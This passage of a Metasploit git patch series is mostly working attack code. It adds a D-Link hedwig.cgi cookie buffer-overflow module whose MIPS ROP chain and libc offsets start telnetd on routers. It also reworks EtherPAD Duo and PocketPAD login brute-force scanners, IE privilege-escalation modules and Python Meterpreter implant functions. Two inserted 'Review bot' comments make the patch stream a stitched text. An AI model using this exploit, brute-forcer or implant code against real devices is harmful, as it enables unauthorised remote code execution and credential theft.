@@ -1282,18 +1289,20 @@ def stdapi_registry_create_key(request, response): def stdapi_registry_delete_key(request, response): root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value'] base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value'] + base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8')) flags = packet_get_tlv(request, TLV_TYPE_FLAGS)['value'] if (flags & DELETE_KEY_FLAG_RECURSIVE): - result = ctypes.windll.shlwapi.SHDeleteKeyA(root_key, base_key) + result = ctypes.windll.shlwapi.SHDeleteKeyA(root_key, ctypes.byref(base_key)) else: - result = ctypes.windll.advapi32.RegDeleteKeyA(root_key, base_key) + result = ctypes.windll.advapi32.RegDeleteKeyA(root_key, ctypes.byref(base_key)) return result, response @meterpreter.register_function_windll def stdapi_registry_delete_value(request, response): root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value'] value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value'] - result = ctypes.windll.advapi32.RegDeleteValueA(root_key, value_name) + value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8')) + result = ctypes.windll.advapi32.RegDeleteValueA(root_key, ctypes.byref(value_name)) return result, response @meterpreter.register_function_windll 
@@ -1362,9 +1371,10 @@ def stdapi_registry_load_key(request, response): def stdapi_registry_open_key(request, response): root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value'] base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value'] + base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8')) permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS) handle_id = ctypes.c_void_p() - if ctypes.windll.advapi32.RegOpenKeyExA(root_key, base_key, 0, permission, ctypes.byref(handle_id)) == ERROR_SUCCESS: + if ctypes.windll.advapi32.RegOpenKeyExA(root_key, ctypes.byref(base_key), 0, permission, ctypes.byref(handle_id)) == ERROR_SUCCESS: response += tlv_pack(TLV_TYPE_HKEY, handle_id.value) return ERROR_SUCCESS, response return ERROR_FAILURE, response 
@@ -1394,24 +1404,26 @@ def stdapi_registry_query_class(request, response): @meterpreter.register_function_windll def stdapi_registry_query_value(request, response): - REG_SZ = 1 - REG_DWORD = 4 hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value'] value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value'] + value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8')) value_type = ctypes.c_uint32() value_type.value = 0 value_data = (ctypes.c_ubyte * 4096)() value_data_sz = ctypes.c_uint32() value_data_sz.value = ctypes.sizeof(value_data) - result = ctypes.windll.advapi32.RegQueryValueExA(hkey, value_name, 0, ctypes.byref(value_type), value_data, ctypes.byref(value_data_sz)) + result = ctypes.windll.advapi32.RegQueryValueExA(hkey, ctypes.byref(value_name), 0, ctypes.byref(value_type), value_data, ctypes.byref(value_data_sz)) if result == ERROR_SUCCESS: response += tlv_pack(TLV_TYPE_VALUE_TYPE, value_type.value) - if value_type.value == REG_SZ: + if value_type.value == winreg.REG_SZ: response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + NULL_BYTE) - elif value_type.value == REG_DWORD: + elif value_type.value == winreg.REG_DWORD: value = value_data[:4] value.reverse() - value = ''.join(map(chr, value)) + if sys.version_info[0] < 3: + value = ''.join(map(chr, value)) + else: + value = bytes(value) response += tlv_pack(TLV_TYPE_VALUE_DATA, value) else: response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data, value_data_sz.value)) 
@@ -1422,9 +1434,10 @@ def stdapi_registry_query_value(request, response): def stdapi_registry_set_value(request, response): hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value'] value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value'] + value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8')) value_type = packet_get_tlv(request, TLV_TYPE_VALUE_TYPE)['value'] value_data = packet_get_tlv(request, TLV_TYPE_VALUE_DATA)['value'] - result = ctypes.windll.advapi32.RegSetValueExA(hkey, value_name, 0, value_type, value_data, len(value_data)) + result = ctypes.windll.advapi32.RegSetValueExA(hkey, ctypes.byref(value_name), 0, value_type, value_data, len(value_data)) return result, response @meterpreter.register_function_windll From 1ddc2d4e870d214052ebd0fcb3c3ca8ebc74697e Mon Sep 17 00:00:00 2001 From: Michael Messner <devnull@s3cur1ty.de> Date: Fri, 30 May 2014 17:32:49 +0200 Subject: [PATCH 426/853] hedwig.cgi - cookie bof - return to system --- .../linux/http/dlink_hedwigcgi_rop_system.rb | 124 ++++++++++++++++++ 1 file changed, 124 insertions(+) create mode 100644 modules/exploits/linux/http/dlink_hedwigcgi_rop_system.rb diff --git a/modules/exploits/linux/http/dlink_hedwigcgi_rop_system.rb b/modules/exploits/linux/http/dlink_hedwigcgi_rop_system.rb new file mode 100644 index 0000000000..960d5ad095 --- /dev/null +++ b/modules/exploits/linux/http/dlink_hedwigcgi_rop_system.rb 
@@ -0,0 +1,124 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ManualRanking # the exploit as it is is excellent but we can only start the telnetd and connect to it + + HttpFingerprint = { :pattern => [ /Linux,\ HTTP\/1.0,\ DIR-/ ] } + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'D-Link hedwig.cgi Buffer Overflow in Cookie Header', + 'Description' => %q{ + This module exploits an anonymous remote code execution vulnerability on different D-Link routers. + This module has been tested successfully on D-Link DIR300-v2.14, DIR600 and DIR645A1_FW103B11. + Different other devices like the DIR865LA1_FW101b06 and DIR845LA1_FW100b20 are also vulnerable + and they were tested within an emulated environment. They are a little bit different in the first ROP gadget. + }, + 'Author' => + [ + 'Roberto Paleari', # Vulnerability discovery + 'Craig Heffner', # also discovered the vulnerability / help with some parts of this exploit + 'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module and verification on different other routers + ], + 'License' => MSF_LICENSE, + 'Platform' => ['linux'], + 'Arch' => ARCH_MIPSLE, + 'DefaultOptions' => { 'PAYLOAD' => 'generic/shell_bind_tcp' }, + 'References' => + [ + [ 'OSVDB', '95950' ], + [ 'EDB', '27283' ], + [ 'URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10008' ], #advisory on vendor web site + [ 'URL', 'http://www.dlink.com/us/en/home-solutions/connect/routers/dir-645-wireless-n-home-router-1000' ], #vendor web site of router + [ 'URL', 'http://roberto.greyhats.it/advisories/20130801-dlink-dir645.txt' ] #original advisory + ], + 'Targets' => + [ + [ 'D-Link DIR-645 v1.03 - start telnetd', + { + 'Offset' => 973, + 'LibcBase' => 0x2aaf8000, #Router + #'LibcBase' => 
0x40854000, # QEMU environment + 'System' => 0x000531FF, # address of system + 'CalcSystem' => 0x000158C8, # calculate the correct address of system + 'CallSystem' => 0x000159CC, # call our system + } + ] + ], + 'DisclosureDate' => 'Feb 08 2013', + 'DefaultTarget' => 0)) + end + + def check + begin + res = send_request_cgi({ + 'uri' => "/hedwig.cgi", + 'method' => 'GET' + }) + + if res && [200, 301, 302].include?(res.code) + return Exploit::CheckCode::Detected + end + rescue ::Rex::ConnectionError + return Exploit::CheckCode::Unknown + end + + Exploit::CheckCode::Unknown + end + + def exploit + lport = datastore['LPORT'] + cmd = "/usr/sbin/telnetd -p #{lport}" + + print_status("#{peer} - Trying to access the vulnerable URL...") + + unless check == Exploit::CheckCode::Detected + fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL") + end + + # prepare our shellcode that triggers the crash: + shellcode = rand_text_alpha_upper(target['Offset']) # padding + shellcode << [target['LibcBase'] + target['System']].pack("V") # s0 - address of system + shellcode << rand_text_alpha_upper(16) # unused reg $s1 - $s4 + shellcode << [target['LibcBase'] + target['CallSystem']].pack("V") # s5 - second gadget (call system) + + # .text:000159CC 10 00 B5 27 addiu $s5, $sp, 0x170+var_160 # get the address of our command into $s5 + # .text:000159D0 21 28 60 02 move $a1, $s3 # not used + # .text:000159D4 21 30 20 02 move $a2, $s1 # not used + # .text:000159D8 21 C8 00 02 move $t9, $s0 # $s0 - system + # .text:000159DC 09 F8 20 03 jalr $t9 # call system + # .text:000159E0 21 20 A0 02 move $a0, $s5 # our cmd -> into a0 as parameter for system + + shellcode << rand_text_alpha_upper(12) # unused registers $s6 - $fp + shellcode << [target['LibcBase'] + target['CalcSystem']].pack("V") # $ra - gadget nr 1 (prepare the parameter for system) + + # .text:000158C8 21 C8 A0 02 move $t9, $s5 # s5 - our second gadget + # .text:000158CC 09 F8 20 03 jalr $t9 # jump the second 
gadget + # .text:000158D0 01 00 10 26 addiu $s0, 1 # s0 our system address - lets calculate the right address + + shellcode << rand_text_alpha_upper(16) # filler in front of our command + shellcode << cmd + + # now lets rock it ... + + print_status("#{peer} - Sending exploit ...") + + res = send_request_cgi({ + 'method' => 'POST', + #'uri' => "/hedwig_gdb.cgi", #for debugging on the router + 'uri' => "/hedwig.cgi", + 'cookie' => "uid=#{shellcode}", + 'encode_params' => false, + 'vars_post' => { + 'test' => 'test', + } + }) + end +end From 76ed9bcf865f486cd7de8bfc2d43ada1f3d825c4 Mon Sep 17 00:00:00 2001 From: Michael Messner <devnull@s3cur1ty.de> Date: Fri, 30 May 2014 17:49:37 +0200 Subject: [PATCH 427/853] hedwig.cgi - cookie bof - return to system --- modules/exploits/linux/http/dlink_hedwigcgi_rop_system.rb | 2 -- 1 file changed, 2 deletions(-) diff --git a/modules/exploits/linux/http/dlink_hedwigcgi_rop_system.rb b/modules/exploits/linux/http/dlink_hedwigcgi_rop_system.rb index 960d5ad095..6106377547 100644 --- a/modules/exploits/linux/http/dlink_hedwigcgi_rop_system.rb +++ b/modules/exploits/linux/http/dlink_hedwigcgi_rop_system.rb @@ -18,8 +18,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Description' => %q{ This module exploits an anonymous remote code execution vulnerability on different D-Link routers. This module has been tested successfully on D-Link DIR300-v2.14, DIR600 and DIR645A1_FW103B11. - Different other devices like the DIR865LA1_FW101b06 and DIR845LA1_FW100b20 are also vulnerable - and they were tested within an emulated environment. They are a little bit different in the first ROP gadget. }, 'Author' => [ From 40a103967e9e7ed43cd4030c05d73c768252966f Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Fri, 30 May 2014 11:28:37 -0500 Subject: [PATCH 428/853] Minor code cleanup --- .../scanner/http/etherpadduo_login.rb | 163 +++++++++--------- 1 file changed, 83 insertions(+), 80 deletions(-) 
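Review bot: `check` returns `Exploit::CheckCode::Detected` for any 200, 301 or 302 answer to `/hedwig.cgi` and never inspects the response, so its result says only that the path answers, not that the device runs an affected firmware. The method should carry a comment that states this, for example `# Detected only means /hedwig.cgi answered; model and firmware version are not verified`. In `exploit`, `res` is assigned from `send_request_cgi` and never read, and that call has no `rescue ::Rex::ConnectionError` although the one in `check` does. The header comment's URL `http//metasploit.com/download` is missing its colon.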
diff --git a/modules/auxiliary/scanner/http/etherpadduo_login.rb b/modules/auxiliary/scanner/http/etherpadduo_login.rb index 42d9bcc6cb..ae1096c3b7 100644 --- a/modules/auxiliary/scanner/http/etherpadduo_login.rb +++ b/modules/auxiliary/scanner/http/etherpadduo_login.rb 
@@ -6,97 +6,100 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::AuthBrute + include Msf::Auxiliary::Scanner -include Msf::Exploit::Remote::HttpClient -include Msf::Auxiliary::Report -include Msf::Auxiliary::AuthBrute -include Msf::Auxiliary::Scanner - -def initialize(info={}) - super(update_info(info, - 'Name' => 'EtherPAD Duo Login Brute Force Utility', - 'Description' => %{ - This module scans for EtherPAD Duo login portal, and - performs a login brute force attack to identify valid credentials. + def initialize(info={}) + super(update_info(info, + 'Name' => 'EtherPAD Duo Login Brute Force Utility', + 'Description' => %{ + This module scans for EtherPAD Duo login portal, and + performs a login brute force attack to identify valid credentials. }, - 'Author' => - [ - 'Karn Ganeshen <KarnGaneshen[at]gmail.com>', - ], - 'License' => MSF_LICENSE - )) + 'Author' => + [ + 'Karn Ganeshen <KarnGaneshen[at]gmail.com>', + ], + 'License' => MSF_LICENSE + )) -end - -def run_host(ip) - unless is_app_epaduo? - return end - print_status("#{peer} - Starting login brute force...") - each_user_pass do |user, pass| - do_login(user, pass) - end -end + def run_host(ip) + unless is_app_epaduo? + return + end -# -# What's the point of running this module if the target actually isn't EtherPAD Duo -# - -def is_app_epaduo? - begin - res = send_request_cgi( - { - 'uri' => '/CGI/mParseCGI?file=mainpage.html', - 'method' => 'GET' - }) - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError - vprint_error("#{peer} - HTTP Connection Failed...") - return false - end - - if (res and res.code == 200 and res.headers['Server'].include?("EtherPAD") and res.body.include?("EtherPAD Duo")) - vprint_good("#{peer} - Running EtherPAD Duo application ...") - return true - else - vprint_error("#{peer} - Application is not EtherPAD Duo. 
Module will not continue.") - return false + print_status("#{peer} - Starting login brute force...") + each_user_pass do |user, pass| + do_login(user, pass) end end -# -# Brute-force the login page -# + # + # What's the point of running this module if the target actually isn't EtherPAD Duo + # -def do_login(user, pass) - vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") - begin - res = send_request_cgi( - { - 'uri' => '/config/configindex.ehtml', - 'method' => 'GET', - 'authorization' => basic_auth(user,pass) - }) - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - vprint_error("#{peer} - HTTP Connection Failed...") - return :abort + def is_app_epaduo? + begin + res = send_request_cgi( + { + 'uri' => normalize_uri('/', 'CGI', 'mParseCGI'), + 'method' => 'GET', + 'vars_get' => { + 'file' => 'mainpage.html' + } + }) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError + vprint_error("#{peer} - HTTP Connection Failed...") + return false + end + + if (res and res.code == 200 and res.headers['Server'].include?("EtherPAD") and res.body.include?("EtherPAD Duo")) + vprint_good("#{peer} - Running EtherPAD Duo application ...") + return true + else + vprint_error("#{peer} - Application is not EtherPAD Duo. 
Module will not continue.") + return false + end end - if (res and res.code == 200 and res.body.include?("Home Page") and res.headers['Server'].include?("EtherPAD")) - print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") - report_hash = { - :host => rhost, - :port => rport, - :sname => 'EtherPAD Duo Portal', - :user => user, - :pass => pass, - :active => true, - :type => 'password' - } - report_auth_info(report_hash) - return :next_user - else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") + # + # Brute-force the login page + # + + def do_login(user, pass) + vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + + begin + res = send_request_cgi( + { + 'uri' => normalize_uri('/', 'config', 'configindex.ehtml'), + 'method' => 'GET', + 'authorization' => basic_auth(user,pass) + }) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE + vprint_error("#{peer} - HTTP Connection Failed...") + return :abort + end + + if res && res.code == 200 && res.body.include?("Home Page") && res.headers['Server'] && res.headers['Server'].include?("EtherPAD") + print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + report_hash = { + :host => rhost, + :port => rport, + :sname => 'EtherPAD Duo Portal', + :user => user, + :pass => pass, + :active => true, + :type => 'password' + } + report_auth_info(report_hash) + return :next_user + else + vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") + end end end -end From d92a7adc68afb0b6c2fabd529319799d18dede42 Mon Sep 17 00:00:00 2001 
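Review bot: `is_app_epaduo?` still calls `res.headers['Server'].include?("EtherPAD")` without checking that the header is present, so a host that answers 200 without a `Server` header raises `NoMethodError` on `nil` and stops the scan of that host. The same commit adds exactly this guard to `do_login`, which leaves the two methods inconsistent. The condition should read `if res && res.code == 200 && res.headers['Server'] && res.headers['Server'].include?("EtherPAD") && res.body.include?("EtherPAD Duo")`. That form also replaces the `and` keywords with `&&`, as the rewritten `do_login` condition already does.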
From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Fri, 30 May 2014 11:31:49 -0500 Subject: [PATCH 429/853] change module filename --- .../http/{etherpadduo_login.rb => etherpad_duo_login.rb} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename modules/auxiliary/scanner/http/{etherpadduo_login.rb => etherpad_duo_login.rb} (98%) diff --git a/modules/auxiliary/scanner/http/etherpadduo_login.rb b/modules/auxiliary/scanner/http/etherpad_duo_login.rb similarity index 98% rename from modules/auxiliary/scanner/http/etherpadduo_login.rb rename to modules/auxiliary/scanner/http/etherpad_duo_login.rb index ae1096c3b7..f17d451bee 100644 --- a/modules/auxiliary/scanner/http/etherpadduo_login.rb +++ b/modules/auxiliary/scanner/http/etherpad_duo_login.rb @@ -78,7 +78,7 @@ class Metasploit3 < Msf::Auxiliary { 'uri' => normalize_uri('/', 'config', 'configindex.ehtml'), 'method' => 'GET', - 'authorization' => basic_auth(user,pass) + 'authorization' => basic_auth(user, pass) }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE vprint_error("#{peer} - HTTP Connection Failed...") From b0bdfa76801b050a9be537eb1fa68b877af814fd Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Fri, 30 May 2014 11:44:42 -0500 Subject: [PATCH 430/853] Clean up code --- .../auxiliary/scanner/http/pocketpad_login.rb | 178 +++++++++--------- 1 file changed, 89 insertions(+), 89 deletions(-) diff --git a/modules/auxiliary/scanner/http/pocketpad_login.rb b/modules/auxiliary/scanner/http/pocketpad_login.rb index 2db142e4df..1a7dc9da52 100644 --- a/modules/auxiliary/scanner/http/pocketpad_login.rb +++ b/modules/auxiliary/scanner/http/pocketpad_login.rb 
@@ -7,98 +7,98 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary -include Msf::Exploit::Remote::HttpClient -include Msf::Auxiliary::Report -include Msf::Auxiliary::AuthBrute -include Msf::Auxiliary::Scanner + include Msf::Exploit::Remote::HttpClient + include Msf::Auxiliary::Report + include Msf::Auxiliary::AuthBrute + include Msf::Auxiliary::Scanner -def initialize(info={}) - super(update_info(info, - 'Name' => 'PocketPAD Login Brute Force Utility', - 'Description' => %{ - This module scans for PocketPAD login portal, and - performs a login brute force attack to identify valid credentials. + def initialize(info={}) + super(update_info(info, + 'Name' => 'PocketPAD Login Brute Force Utility', + 'Description' => %{ + This module scans for PocketPAD login portal, and + performs a login brute force attack to identify valid credentials. }, - 'Author' => - [ - 'Karn Ganeshen <KarnGaneshen[at]gmail.com>', - ], - 'License' => MSF_LICENSE - )) -end - -def run_host(ip) - unless is_app_popad? - return + 'Author' => + [ + 'Karn Ganeshen <KarnGaneshen[at]gmail.com>', + ], + 'License' => MSF_LICENSE + )) end - print_status("#{peer} - Starting login brute force...") - each_user_pass do |user, pass| - do_login(user, pass) + def run_host(ip) + unless is_app_popad? + return + end + + print_status("#{peer} - Starting login brute force...") + each_user_pass do |user, pass| + do_login(user, pass) + end + end + + # + # What's the point of running this module if the target actually isn't PocketPAD + # + + def is_app_popad? 
+ begin + res = send_request_cgi( + { + 'uri' => '/', + 'method' => 'GET' + }) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError + vprint_error("#{peer} - HTTP Connection Failed...") + return false + end + + if res && res.code == 200 && res.headers['Server'] && res.headers['Server'].include?("Smeagol") && res.body.include?("PocketPAD") + vprint_good("#{peer} - Running PocketPAD application ...") + return true + else + vprint_error("#{peer} - Application is not PocketPAD. Module will not continue.") + return false + end + end + + # + # Brute-force the login page + # + + def do_login(user, pass) + vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") + begin + res = send_request_cgi( + { + 'uri' => '/cgi-bin/config.cgi', + 'method' => 'POST', + 'authorization' => basic_auth(user,pass), + 'vars_post' => { + 'file' => "configindex.html" + } + }) + rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE + vprint_error("#{peer} - HTTP Connection Failed...") + return :abort + end + + if (res && res.code == 200 && res.body.include?("Home Page") && res.headers['Server'] && res.headers['Server'].include?("Smeagol")) + print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") + report_hash = { + :host => rhost, + :port => rport, + :sname => 'PocketPAD Portal', + :user => user, + :pass => pass, + :active => true, + :type => 'password' + } + report_auth_info(report_hash) + return :next_user + else + vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") + end end end - -# -# What's the point of running this module if the target actually isn't PocketPAD -# - -def is_app_popad? 
- begin - res = send_request_cgi( - { - 'uri' => '/', - 'method' => 'GET' - }) - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError - vprint_error("#{peer} - HTTP Connection Failed...") - false return - end - - if (res and res.code == 200 and res.headers['Server'].include?("Smeagol") and res.body.include?("PocketPAD")) - vprint_good("#{peer} - Running PocketPAD application ...") - return true - else - vprint_error("#{peer} - Application is not PocketPAD. Module will not continue.") - return false - end -end - -# -# Brute-force the login page -# - -def do_login(user, pass) - vprint_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}") - begin - res = send_request_cgi( - { - 'uri' => '/cgi-bin/config.cgi', - 'method' => 'POST', - 'authorization' => basic_auth(user,pass), - 'vars_post' => { - 'file' => "configindex.html" - } - }) - rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE - vprint_error("#{peer} - HTTP Connection Failed...") - return :abort - end - - if (res and res.code == 200 and res.body.include?("Home Page") and res.headers['Server'].include?("Smeagol")) - print_good("#{peer} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}") - report_hash = { - :host => rhost, - :port => rport, - :sname => 'PocketPAD Portal', - :user => user, - :pass => pass, - :active => true, - :type => 'password' - } - report_auth_info(report_hash) - return :next_user - else - vprint_error("#{peer} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}") - end -end -end From e215bd6e398ef7b6bcbc1c61432aeca2f12a9c76 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Fri, 30 May 2014 12:07:59 -0500 Subject: [PATCH 431/853] Delete unnecessary code and use get_env --- .../windows/local/ms13_097_ie_registry_symlink.rb | 9 +-------- 1 file changed, 1 insertion(+), 8 deletions(-) 
diff --git a/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb b/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb index c0e1c9d897..42e030015e 100644 --- a/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb +++ b/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb @@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Local html_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(4))}.html" session.railgun.kernel32.SetEnvironmentVariableA("HTML_URL", html_uri) - temp = session.sys.config.getenv('TEMP') + temp = get_env('TEMP') print_status("Loading Exploit Library...") @@ -124,12 +124,5 @@ window.close(); end end - def get_dll - path = File.join(Msf::Config.data_directory, "exploits", "CVE-2013-5045", "CVE-2013-5045.dll") - dll = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } - - dll - end - end From b27a95c0081e1e39dd688de3b8e660d74e5fc627 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Fri, 30 May 2014 12:08:55 -0500 Subject: [PATCH 432/853] Delete unused code --- modules/exploits/windows/local/ms14_009_ie_dfsvc.rb | 7 ------- 1 file changed, 7 deletions(-) diff --git a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb index 2e515e13fc..fd21d825d1 100644 --- a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb +++ b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb @@ -112,12 +112,5 @@ shell.Run(command); end end - def get_dll - path = File.join(Msf::Config.data_directory, "exploits", "CVE-2014-0257", "CVE-2014-0257.dll") - dll = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } - - dll - end - end From b99b577705c535caaef9389782e85ffa31591e2c Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Fri, 30 May 2014 12:20:00 -0500 Subject: [PATCH 433/853] Clean environment variable --- modules/exploits/windows/local/ms14_009_ie_dfsvc.rb | 2 ++ 1 file changed, 2 insertions(+) 
diff --git a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb index fd21d825d1..aebb4529cd 100644 --- a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb +++ b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb @@ -77,6 +77,8 @@ class Metasploit3 < Msf::Exploit::Local Timeout.timeout(datastore['DELAY']) { super } rescue Timeout::Error end + + session.railgun.kernel32.SetEnvironmentVariableA("MYURL", nil) end def primer From 3ae4a1671766a92ec7aa468054ae5c3d914877a2 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Fri, 30 May 2014 12:21:23 -0500 Subject: [PATCH 434/853] Clean environment variables --- modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb | 3 +++ 1 file changed, 3 insertions(+) diff --git a/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb b/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb index 42e030015e..457a90bb90 100644 --- a/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb +++ b/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb @@ -73,6 +73,9 @@ class Metasploit3 < Msf::Exploit::Local Timeout.timeout(datastore['DELAY']) { super } rescue Timeout::Error end + + session.railgun.kernel32.SetEnvironmentVariableA("HTA_URL", nil) + session.railgun.kernel32.SetEnvironmentVariableA("HTML_URL", nil) end def primer From 4f5ab2c596becfd78ca0864501e07953d3acb0f9 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre <zeroSteiner@gmail.com> Date: Fri, 30 May 2014 14:35:47 -0400 Subject: [PATCH 435/853] Pymeterpreter support process channels for Python v3 --- data/meterpreter/ext_server_stdapi.py | 3 +- data/meterpreter/meterpreter.py | 47 +++++++++++++++++++-------- 2 files changed, 35 insertions(+), 15 deletions(-) diff --git a/data/meterpreter/ext_server_stdapi.py b/data/meterpreter/ext_server_stdapi.py index 3155e788da..0af3c87a30 100644 --- a/data/meterpreter/ext_server_stdapi.py 
+++ b/data/meterpreter/ext_server_stdapi.py @@ -702,6 +702,7 @@ def stdapi_sys_process_execute(request, response): proc_h.stderr = open(os.devnull, 'rb') else: proc_h = STDProcess(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) + proc_h.echo_protection = True proc_h.start() else: proc_h = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) @@ -1207,7 +1208,7 @@ def stdapi_net_config_get_interfaces_via_windll_mib(): table_data = ctypes.string_at(table, pdwSize.value) entries = struct.unpack('I', table_data[:4])[0] table_data = table_data[4:] - for i in xrange(entries): + for i in range(entries): addrrow = cstruct_unpack(MIB_IPADDRROW, table_data) ifrow = MIB_IFROW() ifrow.dwIndex = addrrow.dwIndex diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py index 7bc733cfc5..24a635bbfc 100644 --- a/data/meterpreter/meterpreter.py +++ b/data/meterpreter/meterpreter.py @@ -8,6 +8,7 @@ import struct import subprocess import sys import threading +import time import traceback try: @@ -120,7 +121,7 @@ def export(symbol): def generate_request_id(): chars = 'abcdefghijklmnopqrstuvwxyz' - return ''.join(random.choice(chars) for x in xrange(32)) + return ''.join(random.choice(chars) for x in range(32)) @export def inet_pton(family, address): @@ -223,11 +224,11 @@ class STDProcessBuffer(threading.Thread): threading.Thread.__init__(self) self.std = std self.is_alive = is_alive - self.data = '' + self.data = bytes() self.data_lock = threading.RLock() def run(self): - for byte in iter(lambda: self.std.read(1), ''): + for byte in iter(lambda: self.std.read(1), bytes()): self.data_lock.acquire() self.data += byte self.data_lock.release() 
@@ -235,15 +236,20 @@ class STDProcessBuffer(threading.Thread): def is_read_ready(self): return len(self.data) != 0 - def read(self, l = None): - data = '' + def peek(self, l = None): + data = bytes() self.data_lock.acquire() if l == None: data = self.data - self.data = '' else: data = self.data[0:l] - self.data = self.data[l:] + self.data_lock.release() + return data + + def read(self, l = None): + self.data_lock.acquire() + data = self.peek(l) + self.data = self.data[len(data):] self.data_lock.release() return data @@ -251,12 +257,25 @@ class STDProcessBuffer(threading.Thread): class STDProcess(subprocess.Popen): def __init__(self, *args, **kwargs): subprocess.Popen.__init__(self, *args, **kwargs) + self.echo_protection = False def start(self): self.stdout_reader = STDProcessBuffer(self.stdout, lambda: self.poll() == None) self.stdout_reader.start() self.stderr_reader = STDProcessBuffer(self.stderr, lambda: self.poll() == None) self.stderr_reader.start() + + def write(self, channel_data): + self.stdin.write(channel_data) + self.stdin.flush() + if 